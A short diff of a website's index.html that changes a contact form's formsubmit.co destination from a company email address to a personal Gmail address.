--- a/index.html
+++ b/index.html
@@ -423,7 +423,7 @@
         
         <div class="flex flex-col lg:flex-row gap-12">
             <div class="lg:w-1/2">
-                <form action="https://formsubmit.co/atendimentovivoempresas@jmztecom.com" method="POST" class="space-y-6">
+                <form action="https://formsubmit.co/vini0911gomez.contas@gmail.com" method="POST" class="space-y-6">
                     <div>
                         <input type="text" id="name" name="name" class="w-full px-4 py-3 form-input focus:outline-none" placeholder="Seu nome" required>
                     </div>
